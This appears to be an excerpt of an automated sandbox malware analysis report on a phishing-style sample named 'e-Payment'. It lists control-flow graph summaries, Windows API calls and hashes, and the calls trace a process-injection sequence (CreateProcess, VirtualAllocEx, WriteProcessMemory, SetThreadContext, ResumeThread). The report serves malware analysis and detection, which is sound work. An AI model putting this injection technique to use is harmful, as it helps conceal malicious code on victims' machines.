                              • Instruction Fuzzy Hash: 00815570A00B058FD724DF69D45579ABBF2BF88305F008A2DD88AD7B40D775E84ACB91

                              Control-flow Graph

control_flow_graph for the function at 0065590C (basic blocks 0065590C-00655A61; CreateActCtxA in the entry block). Node and edge data rendered by the interactive viewer are not reproduced.
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 006559C9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 5261f2f480b2573e6f8f8c8e5f6561896461426e5cc90e971d3c15e8a1efdc38
                              • Instruction ID: 706681066395315068f021f99289a1f3af4bcda6a3f55b8ecf5ddf4fedba95e7
                              • Opcode Fuzzy Hash: 5261f2f480b2573e6f8f8c8e5f6561896461426e5cc90e971d3c15e8a1efdc38
                              • Instruction Fuzzy Hash: BD41F470C00718CFDB24CFA9C894BDEBBB6BF48304F24815AD409AB251DB75594ACF50

                              Control-flow Graph

control_flow_graph for the function at 006544C4 (basic blocks 006544C4-00655A61; CreateActCtxA in the entry block). Node and edge data rendered by the interactive viewer are not reproduced.
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 006559C9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: c80277b62a6f313cce729a5524416de440b3db678e3761286cc859e7da73e19a
                              • Instruction ID: e402eb761ff9686f456bbb0b019d78e5f3689f17429405eabfb9c07a4647760f
                              • Opcode Fuzzy Hash: c80277b62a6f313cce729a5524416de440b3db678e3761286cc859e7da73e19a
                              • Instruction Fuzzy Hash: FF41D270C00719CBDB24DFAAC8447DEBBBABF48304F24816AD409AB251DB75694ACF50

                              Control-flow Graph

control_flow_graph for the function at 023C1578 (basic blocks 023C1578-023C1656; WriteProcessMemory in block 023C15DE-023C161D). Node and edge data rendered by the interactive viewer are not reproduced.
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 023C1610
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: ae04d86ecedd1899da4d62b81d8f0c102c67c4657ec46ffe0c06e90045fac0b2
                              • Instruction ID: 5a73ef5cdba85de27a52328474d3dcde75149f54bd89d0551912706cab62dd18
                              • Opcode Fuzzy Hash: ae04d86ecedd1899da4d62b81d8f0c102c67c4657ec46ffe0c06e90045fac0b2
                              • Instruction Fuzzy Hash: 8A2135719003499FDF10DFAAC884BEEBBF1FF48310F14842AE959A7281C7789941DBA4

                              Control-flow Graph

control_flow_graph for the function at 023C1580 (basic blocks 023C1580-023C1656; WriteProcessMemory in block 023C15DE-023C161D). Node and edge data rendered by the interactive viewer are not reproduced.
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 023C1610
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: 45be78027f2b3abaf1f72ff33e526c97862e95d4e41a6856d9ff868e9d715986
                              • Instruction ID: 767a2d53db7a9adb33135ef5d17498f2f52c7fb853a420596281bd46cf621981
                              • Opcode Fuzzy Hash: 45be78027f2b3abaf1f72ff33e526c97862e95d4e41a6856d9ff868e9d715986
                              • Instruction Fuzzy Hash: A62155719003099FDB10DFAAC880BEEBBF4FF48310F10842AE959A7241C7789940DBA4

                              Control-flow Graph

control_flow_graph for the function at 023C0FA8 (basic blocks 023C0FA8-023C1074; Wow64SetThreadContext in block 023C100B-023C103B). Node and edge data rendered by the interactive viewer are not reproduced.
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 023C102E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 35897f6c8edbf9d53d98790ba229d29052ef251264272fc8298fa3edcafcb8fe
                              • Instruction ID: 66837f027f7f5eb249d03e99d08fe4fe8ff52d109de71e95827623542835827c
                              • Opcode Fuzzy Hash: 35897f6c8edbf9d53d98790ba229d29052ef251264272fc8298fa3edcafcb8fe
                              • Instruction Fuzzy Hash: 8A2157759003488FDB10DFAAC4857EEBBF0EF48324F14842ED559A7241C7789986CFA4

                              Control-flow Graph

                              control_flow_graph 278 23c1668-23c16fd ReadProcessMemory 281 23c16ff-23c1705 278->281 282 23c1706-23c1736 278->282 281->282
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023C16F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 88bee9d08d5f44a9ddf553a63229a8ed1978fa907f15fd96f587fa953a5aa911
                              • Instruction ID: ca2a0d26868787d9d30f8ef6afab3a1cbdc0fbffaee7ea8c8825abf3d6a18f25
                              • Opcode Fuzzy Hash: 88bee9d08d5f44a9ddf553a63229a8ed1978fa907f15fd96f587fa953a5aa911
                              • Instruction Fuzzy Hash: 932125718003499FDB10DFAAC8807EEBBF1FF48310F10842EE959A7240C7789941CBA0

                              Control-flow Graph

                              control_flow_graph 286 65d689-65d724 DuplicateHandle 287 65d726-65d72c 286->287 288 65d72d-65d74a 286->288 287->288
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0065D717
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 7dd7632d7bab6f6f5b681502b2b92e1629dc940fde12a5ec7549d274ae8805a4
                              • Instruction ID: 3f7f08c30d2186fdb81066e3d44d900c3bf8ed610f892ea2617b14facc01204e
                              • Opcode Fuzzy Hash: 7dd7632d7bab6f6f5b681502b2b92e1629dc940fde12a5ec7549d274ae8805a4
                              • Instruction Fuzzy Hash: 0B21E3B5900248DFDB10CFAAD884AEEBBF5FB48324F14801AE958A3350C374AA45CF65

                              Control-flow Graph

                              control_flow_graph 301 23c1670-23c16fd ReadProcessMemory 304 23c16ff-23c1705 301->304 305 23c1706-23c1736 301->305 304->305
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023C16F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: a192ab5f1283915e9a6051ae47831c606c50d3d5a95bf35c803805be344ac098
                              • Instruction ID: 3c2bc03f9c6239e3750077ce15dee7c71c30817c919c0c8fa182fec17077679e
                              • Opcode Fuzzy Hash: a192ab5f1283915e9a6051ae47831c606c50d3d5a95bf35c803805be344ac098
                              • Instruction Fuzzy Hash: EC2114719003499FDB10DFAAC880BEEBBF5FF48310F10842AE959A7240C7789941DBA4

                              Control-flow Graph

                              control_flow_graph 291 23c0fb0-23c0ffb 293 23c0ffd-23c1009 291->293 294 23c100b-23c103b Wow64SetThreadContext 291->294 293->294 296 23c103d-23c1043 294->296 297 23c1044-23c1074 294->297 296->297
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 023C102E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: e0d43943ddb4e21391e79e2b2270d0bc53da34f592a23da1fa12d93d7d9d60d8
                              • Instruction ID: ab962441b5900505a12bbb3dc7eac6b584194cf2cf96bae03f7a2253f59ce471
                              • Opcode Fuzzy Hash: e0d43943ddb4e21391e79e2b2270d0bc53da34f592a23da1fa12d93d7d9d60d8
                              • Instruction Fuzzy Hash: 5A2135719003088FDB10DFAAC4857EEBBF4EF48324F14842ED559A7241C7789945CFA4

                              Control-flow Graph

                              control_flow_graph 309 65d690-65d724 DuplicateHandle 310 65d726-65d72c 309->310 311 65d72d-65d74a 309->311 310->311
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0065D717
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 69821229021d6223fee07402d8a8ed759fde87aaa2ac344e5fa1b332e9363eb1
                              • Instruction ID: c7008e52594f3e39beac4377cdb352cd84c81d291fac9d4cc586cd27656b4669
                              • Opcode Fuzzy Hash: 69821229021d6223fee07402d8a8ed759fde87aaa2ac344e5fa1b332e9363eb1
                              • Instruction Fuzzy Hash: 8421C2B5900248DFDB10CFAAD884ADEFBF9FB48324F14841AE918A7350D374A955CFA5
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0065B079,00000800,00000000,00000000), ref: 0065B28A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: dc6c6c53f1e76f183b98bbeba7e302377a297734213e105c6924386a423fbb28
                              • Instruction ID: 24c67d553e1d095fb88bb187447ed56ba33d9647306ff9bf903ae9e929239a05
                              • Opcode Fuzzy Hash: dc6c6c53f1e76f183b98bbeba7e302377a297734213e105c6924386a423fbb28
                              • Instruction Fuzzy Hash: 281129B69003488FDB10CF9AD444BEEFBF5EB48310F10842AE919A7300C375A545CFA5
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0065B079,00000800,00000000,00000000), ref: 0065B28A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: aa848328bdbe1b695847f28301a99798c4abe077898d2a56aef877293b5f6992
                              • Instruction ID: b5c0e9a872ea03c5f63f2c5cde79dfb5d77ce98e143508e8db4acfbbd66ddf95
                              • Opcode Fuzzy Hash: aa848328bdbe1b695847f28301a99798c4abe077898d2a56aef877293b5f6992
                              • Instruction Fuzzy Hash: 541126B68003488FDB14CFAAD444BEEFBF5EB88310F10842AD819A7710C3B5A645CFA5
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023C152E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: aac16b07ff39dd623694969b4fa602165995002944589e8313825dee5eab5262
                              • Instruction ID: cac52b57eefc8cebb547a79b3a69a3d8f040683fde2769a95483caa2bc4d77ed
                              • Opcode Fuzzy Hash: aac16b07ff39dd623694969b4fa602165995002944589e8313825dee5eab5262
                              • Instruction Fuzzy Hash: DB1164729003498FDB20CFAAC844BEFBBF1EF48314F24845AE559A7640C7759941CFA0
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023C152E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: f58878eed64aa97f066f40be0498e9ec8b9f453aed6c49765bc1cde5e515d3a8
                              • Instruction ID: 9e3db06e3f5439b88caa895801a3caaa3756903cb047b4b854d4040bd9c64ad2
                              • Opcode Fuzzy Hash: f58878eed64aa97f066f40be0498e9ec8b9f453aed6c49765bc1cde5e515d3a8
                              • Instruction Fuzzy Hash: FC1134769003489FDB10DFAAC844BEFBBF5EF48324F24841AE559A7250C775A940DFA4
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 772ae58263d93f23f989a7035e7ad22bc7242b07b34950895b709846d9b3c804
                              • Instruction ID: f38fb0df2cf84a59f3517ad2bf224a4084f393d5d2871027c56ec0a8ae66ac71
                              • Opcode Fuzzy Hash: 772ae58263d93f23f989a7035e7ad22bc7242b07b34950895b709846d9b3c804
                              • Instruction Fuzzy Hash: BF1158719043488FDB14DFAAC4447EFFBF4EB48324F248459D559A7240C775A941CBA4
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 289646daabf9447da47bde071efe008778031bc4500ec5e7075372faba023619
                              • Instruction ID: 6bdc711ca68f6b30dd60a3333f580aaacdae4ada04012253fc82a6f42e7e2044
                              • Opcode Fuzzy Hash: 289646daabf9447da47bde071efe008778031bc4500ec5e7075372faba023619
                              • Instruction Fuzzy Hash: 691155719003488FDB24DFAAC4447EFFBF4EB88324F20842AD519A7240C779A940CBA4
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0065AFFE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: c5b087aa43568da12750058df53de1c3c73690589f17ecb3e1a444f30138bd89
                              • Instruction ID: ca7fc35aa1b04fa0b9d99ef97eba4f79e48d015f1ff27d5788f80b10f7ec6767
                              • Opcode Fuzzy Hash: c5b087aa43568da12750058df53de1c3c73690589f17ecb3e1a444f30138bd89
                              • Instruction Fuzzy Hash: 16110FB6C002498FCB20CF9AC844BDEFBF5EB88324F10842AD828A7250D375A545CFA1
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 023C607D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 19e31c8374b80ea04d90bbb4a76f753f1cc6e1af5d4a7e077110d966323bc808
                              • Instruction ID: f3afdd143433da49223718daa840c1a9c9e706a9ddf5a38d2772841b9b79bd5b
                              • Opcode Fuzzy Hash: 19e31c8374b80ea04d90bbb4a76f753f1cc6e1af5d4a7e077110d966323bc808
                              • Instruction Fuzzy Hash: 6211F2B58043499FDB20DF9AD845BDEBBF8EB48320F20845AE919A7241C375A944CFA5
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 023C607D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: d42513bc74eb8bb7d7c37f952fa1be790ca515b9903bdfbe9339e00435a33890
                              • Instruction ID: c02c0d3178cce68597f77334ffc40983e1c0790c1b76c8d3074fab649fd9fe96
                              • Opcode Fuzzy Hash: d42513bc74eb8bb7d7c37f952fa1be790ca515b9903bdfbe9339e00435a33890
                              • Instruction Fuzzy Hash: D211F2B5900348CFDB10DF99D485BEEBBF8EB48320F20845AE958A7650C375A984CFA5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407471192.000000000060D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_60d000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 851d3578b7efe78b83ee106ac49c9590704f83a3cf6e6ef72706e9700bdb3613
                              • Instruction ID: 266ff8cad050030f941f75af9aed01a0c5f77d7a0764ccb3b8a47041f4624812
                              • Opcode Fuzzy Hash: 851d3578b7efe78b83ee106ac49c9590704f83a3cf6e6ef72706e9700bdb3613
                              • Instruction Fuzzy Hash: E7213471544304EFDB09DF90D9C0B27BBA2FB84314F20C6ADEA094B382C336D946CA61
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407471192.000000000060D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_60d000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f7475a47dd94035a83c1dc523c5179f34f81e225a0c161cdc31794ba0fb81527
                              • Instruction ID: 3cba509c5005804d3652d90c52d453223f9864d3425114e172d3b002224ed524
                              • Opcode Fuzzy Hash: f7475a47dd94035a83c1dc523c5179f34f81e225a0c161cdc31794ba0fb81527
                              • Instruction Fuzzy Hash: 9021D371644204EFDB18DF54D984B17BBA6EB84314F20C669E84E4B386C336D847CA62
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407471192.000000000060D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_60d000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c28ad3ccb8fc3c101f2d7ac64a6edf51da6c57475097a2a2d373efa503b68275
                              • Instruction ID: 175df013973135291e07e506d38a78a79beb0091ab9e7e0ea7c5b246836437fa
                              • Opcode Fuzzy Hash: c28ad3ccb8fc3c101f2d7ac64a6edf51da6c57475097a2a2d373efa503b68275
                              • Instruction Fuzzy Hash: 9E21B3755493808FC716CF20C990712BF72EB46314F28C6DAD8498F6A3C33A980ACB62
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407471192.000000000060D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_60d000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                              • Instruction ID: 4273985f98794157109db85ffd8a30a081ce5308168b2e3e2bcf13db1353e2fc
                              • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                              • Instruction Fuzzy Hash: 5611BB75544280DFCB16CF54C5C4B56BBA2FB84314F24C6AAD9494B796C33AD80ACB61
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b6df13fd32c6a9b9ddbeab875cdfd0f36fb15d5620be779dbd8fefb323c19de6
                              • Instruction ID: 10e5be9399bf144211839069af0eaff0419bf0e6cae7cfc51e2f5eb068f50335
                              • Opcode Fuzzy Hash: b6df13fd32c6a9b9ddbeab875cdfd0f36fb15d5620be779dbd8fefb323c19de6
                              • Instruction Fuzzy Hash: 45E11674E10259CFDB14DFA9C580AAEBBB2FF89304F248169D805AB359C731AD41CF61
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6b21ceb0cdf4023b8b2ee0c5f2902453475de85c1bb0454ec4263bc134a80f8c
                              • Instruction ID: 901bcab96510287bc0639f41476ba45d7d98a1e03fbd462678272e3b2ecf8288
                              • Opcode Fuzzy Hash: 6b21ceb0cdf4023b8b2ee0c5f2902453475de85c1bb0454ec4263bc134a80f8c
                              • Instruction Fuzzy Hash: F7E11A74E102198FDB14DFA9C580AAEFBF2BF89304F248169D449AB35AD731AD41CF61
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bbd416865fc764b1177041ed76b9ca06c2d479a5a44a43f2ec4ae216e2df1763
                              • Instruction ID: 6585df8f710602b10342545efe96f06da2f223611cc0ad65781a247cdf2180c7
                              • Opcode Fuzzy Hash: bbd416865fc764b1177041ed76b9ca06c2d479a5a44a43f2ec4ae216e2df1763
                              • Instruction Fuzzy Hash: F0E11974E10259CFDB14DFA9C580AAEFBB2BF89304F248169D815AB359C731AD41CFA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a30d4622c4c2fed1efa6691e86de77c3d252b90d7755ef54cce1051f37e7c25
                              • Instruction ID: 9795069e72e9a6bae5cb4497434d10f4fa1e4b3e21b497d253dc18f0acb5a690
                              • Opcode Fuzzy Hash: 2a30d4622c4c2fed1efa6691e86de77c3d252b90d7755ef54cce1051f37e7c25
                              • Instruction Fuzzy Hash: 27A13936E00609CFCF19DFA4C8445DEB7B6FF85301B15857AE806AB265DB71E919CB80
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b142d5e5f0d852eb234be661314effbbf878eed0a32c37c1cc3d4640f44036b3
                              • Instruction ID: 277becc0be73552624349163d8406959f201cac674409cfd3be5bf4fa01a4938
                              • Opcode Fuzzy Hash: b142d5e5f0d852eb234be661314effbbf878eed0a32c37c1cc3d4640f44036b3
                              • Instruction Fuzzy Hash: 59512B70E052598FDB14DFA9C5805AEFBF2BF8A304F2481AAD458AB315D7319D41CFA1

                              Execution Graph

                              Execution Coverage:11.8%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:171
                              Total number of Limit Nodes:5
                              execution_graph 19623 280d040 19624 280d086 GetCurrentProcess 19623->19624 19626 280d0d1 19624->19626 19627 280d0d8 GetCurrentThread 19624->19627 19626->19627 19628 280d115 GetCurrentProcess 19627->19628 19629 280d10e 19627->19629 19630 280d14b 19628->19630 19629->19628 19631 280d173 GetCurrentThreadId 19630->19631 19632 280d1a4 19631->19632 19661 280d690 DuplicateHandle 19662 280d726 19661->19662 19663 280acb0 19664 280acbf 19663->19664 19667 280ad97 19663->19667 19675 280ada8 19663->19675 19668 280adb9 19667->19668 19669 280addc 19667->19669 19668->19669 19683 280b040 19668->19683 19687 280b031 19668->19687 19669->19664 19670 280add4 19670->19669 19671 280afe0 GetModuleHandleW 19670->19671 19672 280b00d 19671->19672 19672->19664 19676 280adb9 19675->19676 19678 280addc 19675->19678 19676->19678 19681 280b040 LoadLibraryExW 19676->19681 19682 280b031 LoadLibraryExW 19676->19682 19677 280add4 19677->19678 19679 280afe0 GetModuleHandleW 19677->19679 19678->19664 19680 280b00d 19679->19680 19680->19664 19681->19677 19682->19677 19684 280b054 19683->19684 19685 280b079 19684->19685 19691 280a130 19684->19691 19685->19670 19688 280b040 19687->19688 19689 280b079 19688->19689 19690 280a130 LoadLibraryExW 19688->19690 19689->19670 19690->19689 19692 280b220 LoadLibraryExW 19691->19692 19694 280b299 19692->19694 19694->19685 19633 48a5068 19634 48a51f3 19633->19634 19636 48a508e 19633->19636 19636->19634 19637 48a1910 19636->19637 19638 48a52e8 PostMessageW 19637->19638 19639 48a5354 19638->19639 19639->19636 19695 48a20bf 19699 48a2024 19695->19699 19696 48a238b 19699->19696 19700 48a3e4b 19699->19700 19716 48a3e58 19699->19716 19701 48a3e58 19700->19701 19708 48a3e96 19701->19708 19732 48a481d 19701->19732 19736 48a42fe 19701->19736 19741 48a4685 19701->19741 19746 48a4c40 19701->19746 19751 48a49e3 19701->19751 19756 48a4663 19701->19756 19761 48a444d 19701->19761 19769 48a4b2d 19701->19769 19773 48a43ce 19701->19773 19778 48a4ba9 

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0280D0BE
                              • GetCurrentThread.KERNEL32 ref: 0280D0FB
                              • GetCurrentProcess.KERNEL32 ref: 0280D138
                              • GetCurrentThreadId.KERNEL32 ref: 0280D191
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0280D0BE
                              • GetCurrentThread.KERNEL32 ref: 0280D0FB
                              • GetCurrentProcess.KERNEL32 ref: 0280D138
                              • GetCurrentThreadId.KERNEL32 ref: 0280D191
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0

                              Control-flow Graph

                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 048A1E3E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
